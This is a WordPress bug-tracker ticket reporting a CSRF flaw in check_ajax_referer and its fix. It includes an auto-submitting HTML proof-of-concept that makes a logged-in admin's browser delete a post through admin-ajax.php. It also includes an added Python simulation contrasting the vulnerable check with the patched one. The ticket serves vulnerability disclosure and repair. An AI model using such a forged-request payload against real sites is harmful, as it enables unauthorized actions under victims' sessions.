Ticket #4939 (closed defect (bug): fixed)

Opened 1 year ago

Last modified 1 year ago

check_ajax_referer does not protect from CSRF at all

Reported by: xknown
Assigned to: anonymous
Priority: high
Milestone: 2.3
Component: Security
Version: 2.3
Severity: normal
Keywords:
Cc:

Description

check_ajax_referer only checks if the incoming request contains valid user credentials, but wp_get_current_user still uses WP cookies to determine the current user, so anyone with a subscriber role (or another role) can perform CSRF attacks.

<html>
<body>
	<!-- Auto-submitting form: the victim's browser attaches the victim's own WP cookies to this request. -->
	<form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php">
		<input type="text" name="action" value="delete-post" />
		<input type="text" name="id" value="Post_ID" />
		<!-- The attacker's own (subscriber) credentials; check_ajax_referer validates these, not the victim's. -->
		<input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" />
	</form>
	<script>document.forms[0].submit();</script>
</body>
</html>

Attachments

pluggable.diff (357 bytes) - added by xknown on 09/09/07 01:07:03.
Set current user in check_ajax_referer.
4939.diff (1.0 kB) - added by mdawaffe on 09/13/07 05:25:41.

Change History

09/09/07 01:07:03 changed by xknown

  • attachment pluggable.diff added.

Set current user in check_ajax_referer.

09/13/07 04:08:59 changed by mdawaffe

Rather than setting the user, we could check to see if the current user matches the user from the cookie and die('-1') otherwise.
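Added example, not part of the ticket, the attached patches, or WordPress itself: a small Python model of the confused-deputy bug in the description and of the check mdawaffe proposes above. The user table, cookie hashing, `Request` class, `admin_ajax_delete_post` handler and the two `*_outcome` helpers are constructed for this model; only the cookie names and the `die('-1')` convention come from the ticket. The "vulnerable" check validates whatever credentials arrive in the POSTed `cookie` field, while the acting user is still resolved from the browser cookies; the "fixed" check additionally requires the user named in that field to be the current user.

```python
import hashlib
import hmac

# Constructed user table for the model (not WordPress data): name -> (cookie hash, role).
USERS = {
    "admin": (hashlib.sha256(b"admin-password").hexdigest(), "administrator"),
    "subscriber": (hashlib.sha256(b"subscriber-password").hexdigest(), "subscriber"),
}
COOKIE_USER = "wordpressuser_sitehash"  # cookie names as in the ticket's PoC
COOKIE_PASS = "wordpresspass_sitehash"


class Request:
    """Browser cookies are attached by the victim's browser; the POST body is the attacker's form."""

    def __init__(self, cookies, post):
        self.cookies = cookies
        self.post = post


def parse_cookie_string(raw):
    """Parse 'a=1; b=2' (the format the POSTed 'cookie' field carries) into a dict."""
    out = {}
    for part in raw.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            out[key] = value
    return out


def credentials_valid(user, pw_hash):
    record = USERS.get(user)
    return record is not None and pw_hash is not None and hmac.compare_digest(record[0], pw_hash)


def wp_get_current_user(req):
    """The ticket's point: the acting user is resolved from the browser cookies only."""
    user = req.cookies.get(COOKIE_USER)
    if credentials_valid(user, req.cookies.get(COOKIE_PASS)):
        return user
    return None


def check_ajax_referer_vulnerable(req):
    """Before the fix: only asks whether the POSTed 'cookie' field holds valid credentials."""
    c = parse_cookie_string(req.post.get("cookie", ""))
    return credentials_valid(c.get(COOKIE_USER), c.get(COOKIE_PASS))


def check_ajax_referer_fixed(req):
    """mdawaffe's proposal: the user in the POSTed cookie must be the current user, else die('-1')."""
    c = parse_cookie_string(req.post.get("cookie", ""))
    if not credentials_valid(c.get(COOKIE_USER), c.get(COOKIE_PASS)):
        return False
    return c.get(COOKIE_USER) == wp_get_current_user(req)


def admin_ajax_delete_post(req, check, posts):
    """Hypothetical handler for action=delete-post; returns '-1' on refusal, like admin-ajax.php."""
    if not check(req):
        return "-1"
    actor = wp_get_current_user(req)
    if actor is None or USERS[actor][1] != "administrator":
        return "-1"
    post_id = int(req.post["id"])
    if post_id not in posts:
        return "-1"
    del posts[post_id]
    return "deleted"


def csrf_outcome(check):
    """Logged-in admin is lured to the attacker's auto-submitting form carrying the subscriber's cookie."""
    posts = {7: "a draft the admin owns"}  # constructed sample data
    attacker_cookie = "%s=subscriber; %s=%s" % (COOKIE_USER, COOKIE_PASS, USERS["subscriber"][0])
    req = Request(
        cookies={COOKIE_USER: "admin", COOKIE_PASS: USERS["admin"][0]},
        post={"action": "delete-post", "id": "7", "cookie": attacker_cookie},
    )
    return admin_ajax_delete_post(req, check, posts)


def legitimate_outcome(check):
    """The admin's own admin page posts the admin's own cookie string (assumed client behaviour)."""
    posts = {7: "a draft the admin owns"}
    own_cookie = "%s=admin; %s=%s" % (COOKIE_USER, COOKIE_PASS, USERS["admin"][0])
    req = Request(
        cookies={COOKIE_USER: "admin", COOKIE_PASS: USERS["admin"][0]},
        post={"action": "delete-post", "id": "7", "cookie": own_cookie},
    )
    return admin_ajax_delete_post(req, check, posts)


if __name__ == "__main__":
    print("vulnerable check, CSRF :", csrf_outcome(check_ajax_referer_vulnerable))
    print("fixed check, CSRF      :", csrf_outcome(check_ajax_referer_fixed))
    print("fixed check, legitimate:", legitimate_outcome(check_ajax_referer_fixed))
```

With the vulnerable check the subscriber's credentials pass and the post is deleted under the admin's session; with the proposed check the mismatch between the posted user and the cookie-derived current user returns `-1`, while the admin's own request still succeeds. The general lesson is that a token proving "someone holds valid credentials" does not bind the request to the principal who will act on it.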

09/13/07 05:25:41 changed by mdawaffe

  • attachment 4939.diff added.

09/13/07 21:37:06 changed by Nazgul

  • priority changed from normal to high.
  • milestone set to 2.3.

09/19/07 19:32:34 changed by ryan

  • status changed from new to closed.
  • resolution set to fixed.

(In [6138]) Extra protection in check_ajax_referer from mdawaffe. fixes #4939